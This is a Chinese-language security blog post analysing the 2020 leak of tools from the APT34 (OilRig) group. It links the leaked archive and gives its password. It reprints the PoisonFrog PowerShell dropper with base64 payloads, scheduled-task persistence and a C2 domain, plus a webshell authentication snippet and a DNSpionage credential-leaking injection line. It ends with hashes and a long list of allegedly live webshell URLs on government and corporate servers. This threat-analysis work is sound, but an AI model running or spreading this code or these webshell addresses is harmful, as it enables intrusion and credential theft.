APT34黑客组织工具泄露事件分析

网e渗透安全部

发布于 2020-02-13 18:10:00

1.6K0

发布于 2020-02-13 18:10:00

文章被收录于专栏：白安全组白安全组

APT34黑客组织工具泄露事件分析

工具地址

https://s3-eu-west-1.amazonaws.com/malware-research.org/blogposts/apt34Leak/apt34leak.7z

解压密码：vJrqJeJo2n005FF*

事件梳理

最近有人发布了属于伊朗国家背景的APT攻击组织APT34(oilrig,HelixKitten）的黑客工具，这起事件和之前影子经纪人泄漏NSA的黑客工具事件很相似，自3月中旬以来，这些工具已被一个自称Lab Dookhtegan的人在telegram节目上泄露。

除了黑客工具之外，Dookhtegan还发布了一些似乎是来自APT34的一些黑客受害者的数据，这些数据主要包括似乎是通过网络钓鱼页面收集的用户名和密码组合。

披露了一些伊朗的情报人员信息

从他对伊朗目标的打击方式来看，可以说是毫不留情。

工具包如下

截至目前为止，黑客已经泄露了六个APT34的黑客工具的源代码，以及几个远控Webshell

该黑客声称每隔几天就曝光一名工作人员个人信息

黑客工具列表：

- PoisonFrog (老版本BondUpdater)

- HyperShell (名为TwoFace的webshell)

- HighShell (另一个webshell)

- Webmask (DNS隧道，大名鼎鼎的DNSpionage)

工具分析:

1.posionfrog

包括两部分

服务器端模块，node.js写的c2

代理程序部分，powershell版的payload

${global:$address1} = $env:PUBLIC + "\Public";
${global:$dns_ag} = "JENDQSA9ICJteWxlZnRoZWFydC5jb20iOw0KJEREQSA9IGdldC13bWlvYmplY3QgV2luMzJfQ29tcHV0ZXJTeXN0ZW1Qcm9kdWLUVuY29kaW5nIEJ5dGU7DQoJJGUgPSByZXNvbHZlcigkZik7DQoXN0LVBhdGggLVBhdGggJHtnbG9iYWw6JFNTQn0pIC1vciAtbm90IChUZXN0LVBhdGggLVBhdGggJHtnbG9iYWw6JEFBQn0pKQ0Kew0KCW1kICR7Z2xvYmFsOiRTU0J9Ow0KCW1kICR7Z2xvYmFsOiRBQUJ9Ow0KCW1kICR7Z2xvYmFsOiRRUUF9Ow0KCW1kICR7Z2xvYmFsOiRUVEJ9Ow0KfQ0KcmVjZWl2ZTsNCnByb2Nlc3NvcjsNCnNlbmQ7";
${global:$http_ag} = "JEJCQSA9ICJodHRwOi8vIiArIFtTeXN0ZW0uTmV0LkRuc106OkdldEhvc3RBZGRyZXNzZXMoIm15bGVmdGhlYXJ0LmNvbSIpDQoke2dsb2JhbDokQ0NBfSA9IG5ldy1vYmplY3Qgc3lzdGVtLm5ldC5XZWJDbGllbnQNCiR0ID0gZ2V0LXdtaW9iamVjdCBXaW4zMAtZXEgIjEiKSB7DQoJCQkJJHIgPSAkdHJ1ZTsNCgkJCX0NCgkJCWlmKCRUVEEgLW5lICJub3QiIC1hbmQgJFRUQSkgew0KCQkJCSR7Z2xvYmFsOiRDQ0F9LlVwbG9hZEZpbGUoIiRCQkEvcmVzLyRQUEEkVFRBIiwgJHApOw0KCQkJCVJlbW92ZS1JdGVtICRwIC1Gb3JjZQ0KCQkJfQ0KCQl9DQoJfQ0KfQ==";
 
if (-not (Test-Path -Path ${global:$address1}))
{md ${global:$address1}; Get-Item ${global:$address1} -Force | %{$_.attributes = "Hidden"}}
if (Test-Path -Path ${global:$address1})
{
    [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([string]${global:$http_ag})) | Set-Content "${global:$address1}\hUpdater.ps1";
    [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([string]${global:$dns_ag})) | Set-Content "${global:$address1}\dUpdater.ps1";
    "command0 = `"Powershell.exe -exec bypass -file ${global:$address1}\hUpdater.ps1`"`nset Shell0 = CreateObject(`"wscript.shell`")`nshell0.run command0, 0, false`ncommand1 = `"Powershell.exe -exec bypass -file ${global:$address1}\dUpdater.ps1`"`nset Shell1 = CreateObject(`"wscript.shell`")`nshell1.run command1, 0, false" | Out-File "${global:$address1}\UpdateTask.vbs"
    schtasks /create /F /sc minute /mo 10 /tn "\UpdateTasks\UpdateTask" /tr "wscript /b \`"${global:$address1}\UpdateTask.vbs\`"";
    schtasks /create /F /ru SYSTEM /sc minute /mo 10 /tn "\UpdateTasks\UpdateTaskHosts" /tr "wscript /b \`"${global:$address1}\UpdateTask.vbs\`"";

代理程序部分包含2个base64，它们加载了powershell，这似乎是第一阶段的payload。它从myleftheart.com（现在已经关闭）中去获取配置文件，在C:\Users\Public\Public中创建一堆文件夹，并在那里删除其他两个payload。它还创建了2个计划任务，一个具有管理员权限，一个具有普通用户权限，这些任务将运行两个PowerShell的脚本; dUpdater.ps1和hUpdater.ps每10分钟一次。现在从这两个payload中可以清楚地看到它可以接收和发送文件。

好像这里还使用了代理：

schtasks /create /F /sc minute /mo 10 /tn "\UpdateTasks\UpdateTask" /tr "wscript /b \`"${global:$address1}\UpdateTask.vbs\`"";
schtasks /create /F /ru SYSTEM /sc minute /mo 10 /tn "\UpdateTasks\UpdateTaskHosts" /tr "wscript /b \`"${global:$address1}\UpdateTask.vbs\`"";

配置文件中存有登录用户名密码

$u = "http://" + $HHA + ":" + $KKA;
 
 $MMA = new-object System.Net.WebProxy($u, $true);
 
 $NNA = new-object System.Net.NetworkCredential($IIA, $JJA, $LLA)
 
 $MMA.credentials = $NNA

这个函数返回myleftheart.com域的子域：

CCA = "myleftheart.com";$DDA = get-wmiobject Win32_ComputerSystemProduct  | Select-Object -ExpandProperty UUID | %{ "atag12" + $_.replace('-','') }| %{$_ + "1234567890"} | %{$_.substring(0,10)}
function EEA ($FFA, $GGA, $HHA, $IIA, $JJA){ $KKA = -join ((48 .. 57)+(65 .. 70) | Get-Random  -Count (%{ Get-Random -InputObject (1 .. 7) }) | %{ [char]$_ }); $LLA = Get-Random -InputObject (0 .. 9) -Count 2; $MMA = $DDA.Insert(($LLA[1]), $GGA).Insert($LLA[0], $FFA); write-host $DDA; if ($JJA -eq "s")
 { Print "$($MMA)$($KKA)A$($LLA[0])$($LLA[1])7.$HHA.$IIA.$CCA";} else  { Print "$($MMA)$($KKA)A$($LLA[0])$($LLA[1])7.$($CCA)";}

2.Asp WebShell

泄漏的很大一部分有大量的，被称为和，其中包含了相当多的变种。超过30k行代码… 为了查看shell，你需要有一个叫做的和正确的密码。不幸的是，泄漏者删除了所有有意义的密码，并用替换了它们。

将cookie与te字符串进行比较，这是base64后的结果：base64(sha256(Bytes(cookie+salt)))

bool c(){try{if(HttpContext.Current.Request.Cookies["p"]!=null){aut=Convert.ToBase64String(new System.Security.Cryptography.SHA256CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(fb(HttpContext.Current.Request.Cookies["p"].Value)+salt)))==pp;if(!aut)rm();return aut;}}catch(Exception e){l(e.Message);}rm();return false;}

似乎有2个ASP Shell仍然在线：

hxxps://webmail.sstc.com.sa/owa/auth/logout.aspx<br>hxxps://mail.adac.ae/owa/auth/RedirOutlookService.aspx/

3.webmask_dnspionage

这是一个ICAP服务器，似乎能够接收所有类型的数据，如凭据，cookie …

这一行比较有意思：

script = ';$(document).ready(function(){$(\'<img src="file://[ip]/resource/logo.jpg"><img src="http://WPAD/avatar.jpg">\');});'

[ip]应该是被替换成攻击者IP，然后当它作为img注入到受害者的浏览器时，它将触发Windows跳转到并且攻击者将能够窃取。

第二部分是dns.py，也有它的javascript代码dnsd.js响应。所以基本上这将使攻击者能够将使用该dns的受害者发送到他自己的恶意服务器上。

其他文件包含了许多来自用户的私钥和凭据，还包含许多域的DA凭据：

4.data

其他大多数均为一些数据信息，没有细致看

IOC

27e03b98ae0f6f2650f378e9292384f1350f95ee4f3ac009e0113a8d9e2e14ed
b1d621091740e62c84fc8c62bcdad07873c8b61b83faba36097ef150fd6ec768
2943e69e6c34232dee3236ced38d41d378784a317eeaf6b90482014210fcd459
07e791d18ea8f2f7ede2962522626b43f28cb242873a7bd55fff4feb91299741
dd6d7af00ef4ca89a319a230cdd094275c3a1d365807fe5b34133324bdaa0229
3ca3a957c526eaeabcf17b0b2cd345c0fffab549adfdf04470b6983b87f7ec62
c9d5dc956841e000bfd8762e2f0b48b66c79b79500e894b4efa7fb9ba17e4e9e
a6a0fbfee08367046d3d26fb4b4cf7779f7fb6eaf7e60e1d9b6bf31c5be5b63e
fe1b011fe089969d960d2dce2a61020725a02e15dbc812ee6b6ecc6a98875392

shell

hxxps://202.183.235.31/owa/auth/signout.aspx
hxxps://202.183.235.4/owa/auth/signout.aspx
hxxps://122.146.71.136/owa/auth/error3.aspx
hxxps://59.124.43.229/owa/auth/error0.aspx
hxxps://202.134.62.169/owa/auth/signin.aspx
hxxps://202.164.27.206/owa/auth/signout.aspx
hxxps://213.14.218.51/owa/auth/logon.aspx
hxxps://88.255.182.69/owa/auth/getidtoken.aspx
hxxps://95.0.139.4/owa/auth/logon.aspx
hxxps://1.202.179.13/owa/auth/error1.aspx
hxxps://1.202.179.14/owa/auth/error1.aspx
hxxps://114.255.190.1/owa/auth/error1.aspx
hxxps://180.166.27.217/owa/auth/error3.aspx
hxxps://180.169.13.230/owa/auth/error1.aspx
hxxps://210.22.172.26/owa/auth/error1.aspx
hxxps://221.5.148.230/owa/auth/outlook.aspx
hxxps://222.178.70.8/owa/auth/outlook.aspx
hxxps://222.66.8.76/owa/auth/error1.aspx
hxxps://58.210.216.113/owa/auth/error1.aspx
hxxps://60.247.31.237/owa/auth/error3.aspx
hxxps://60.247.31.237/owa/auth/logoff.aspx
hxxps://202.104.127.218/owa/auth/error1.aspx
hxxps://202.104.127.218/owa/auth/exppw.aspx
hxxps://132.68.32.165/owa/auth/logout.aspx
hxxps://132.68.32.165/owa/auth/signout.aspx
hxxps://209.88.89.35/owa/auth/logout.aspx
hxxps://114.198.235.22/owa/auth/login.aspx
hxxps://114.198.237.3/owa/auth/login.aspx
hxxps://185.10.115.199/owa/auth/logout.aspx
hxxps://195.88.204.17/owa/auth/logout.aspx
hxxps://46.235.95.125/owa/auth/signin.aspx
hxxps://51.211.184.170/owa/auth/owaauth.aspx
hxxps://91.195.89.155/owa/auth/signin.aspx
hxxps://82.178.124.59/owa/auth/gettokenid.aspx
hxxps://83.244.91.132/owa/auth/logon.aspx
hxxps://195.12.113.50/owa/auth/error3.aspx
hxxps://78.100.87.199/owa/auth/logon.aspx
hxxps://110.74.202.90/owa/auth/errorff.aspx
hxxps://211.238.138.68/owa/auth/error1.aspx
hxxps://168.63.221.220/owa/auth/error3.aspx
hxZps://213.189.82.221/owa/auth/errorff.aspx
hxxps://205.177.180.161/owa/auth/erroref.aspx
hxxps://77.42.251.125/owa/auth/logout.aspx
hxxps://202.175.114.11/owa/auth/error1.aspx
hxxps://202.175.31.141/owa/auth/error3.aspx
hxxps://213.131.83.73/owa/auth/error4.aspx
hxxps://187.174.201.179/owa/auth/error1.aspx
hxxps://200.33.162.13/owa/auth/error3.aspx
hxxps://202.70.34.68/owa/auth/error0.aspx
hxxps://202.70.34.68/owa/auth/error1.aspx
hxxps://197.253.14.10/owa/auth/logout.aspx
hxxps://41.203.90.221/owa/auth/logout.aspx
hxxp://www.abudhabiairport.ae/english/resources.aspx
hxxps://mailkw.agility.com/owa/auth/RedirSuiteService.aspx
hxxp://www.ajfd.gov.ae/_layouts/workpage.aspx
hxxps://mail.alfuttaim.ae/owa/auth/change_password.aspx
hxxps://mail.alraidah.com.sa/owa/auth/GetLoginToken.aspx
hxxp://www.alraidah.com.sa/_layouts/WrkSetlan.aspx
hxxps://webmail.alsalam.aero/owa/auth/EventClass.aspx
hxxps://webmail.bix.bh/owa/auth/Timeoutctl.aspx
hxxps://webmail.bix.bh/owa/auth/EventClass.aspx
hxxps://webmail.bix.bh/ecp/auth/EventClass.aspx
hxxps://webmail.citc.gov.sa/owa/auth/timeout.aspx
hxxps://mail.cma.org.sa/owa/auth/signin.aspx
hxxps://mail.dallah-hospital.com/owa/auth/getidtokens.aspx
hxxps://webmail.dha.gov.ae/owa/auth/outlookservice.aspx
hxxps://webmail.dnrd.ae/owa/auth/getidtoken.aspx
hxxp://dnrd.ae:8080/_layouts/WrkStatLog.aspx
hxxps://www.dns.jo/statistic.aspx
hxxps://webmail.dsc.gov.ae/owa/auth/outlooklogonservice.aspx
hxxps://e-albania.al/dptaktkonstatim.aspx
hxxps://owa.e-albania.al/owa/auth/outlookdn.aspx
hxxps://webmail.eminsco.com/owa/auth/outlookfilles.aspx
hxxps://webmail.eminsco.com/owa/auth/OutlookCName.aspx
hxxps://webmail.emiratesid.ae/owa/auth/RedirSuiteService.aspx
hxxps://mailarchive.emiratesid.ae/EnterpriseVault/js/jquery.aspx
hxxps://webmail.emiratesid.ae/owa/auth/handlerservice.aspx
hxxp://staging.forus.jo/_layouts/explainedit.aspx
hxxps://government.ae/tax.aspx
hxxps://formerst.gulfair.com/GFSTMSSSPR/webform.aspx
hxxps://webmail.ictfund.gov.ae/owa/auth/owaauth.aspx
hxxps://jaf.mil.jo/ShowContents.aspx
hxxp://www.marubi.gov.al/aspx/viewpercthesaurus.aspx
hxxps://mail.mindware.ae/owa/auth/outlooktoken.aspx
hxxps://mail.mis.com.sa/owa/auth/Redirect.aspx
hxxps://webmail.moe.gov.sa/owa/auth/redireservice.aspx
hxxps://webmail.moe.gov.sa/owa/auth/redirectcache.aspx
hxxps://gis.moei.gov.ae/petrol.aspx
hxxps://gis.moenr.gov.ae/petrol.aspx
hxxps://m.murasalaty.moenr.gov.ae/signproces.aspx
hxxps://mail.mofa.gov.iq/owa/auth/RedirSuiteService.aspx
hxxp://ictinfo.moict.gov.jo/DI7Web/libraries/aspx/RegStructures.aspx
hxxp://www.mpwh.gov.jo/_layouts/CreateAdAccounts.aspx
hxxps://mail.mygov.ae/owa/auth/owalogin.aspx
hxxps://ksa.olayan.net/owa/auth/signin.aspx
hxxps://mail.omantourism.gov.om/owa/auth/GetTokenId.aspx
hxxps://email.omnix-group.com/owa/auth/signon.aspx
hxxps://mail.orange-jtg.jo/OWA/auth/signin.aspx
hxxp://fwx1.petra.gov.jo/SEDCOWebServer/global.aspx
hxxp://fwx1.petranews.gov.jo/SEDCOWebServer/content/rtl/QualityControl.aspx
hxxps://webmail.presflt.ae/owa/auth/logontimeout.aspx
hxxps://webmail.qchem.com/OWA/auth/RedirectCache.aspx
hxxps://meet.saudiairlines.com/ClientResourceHandler.aspx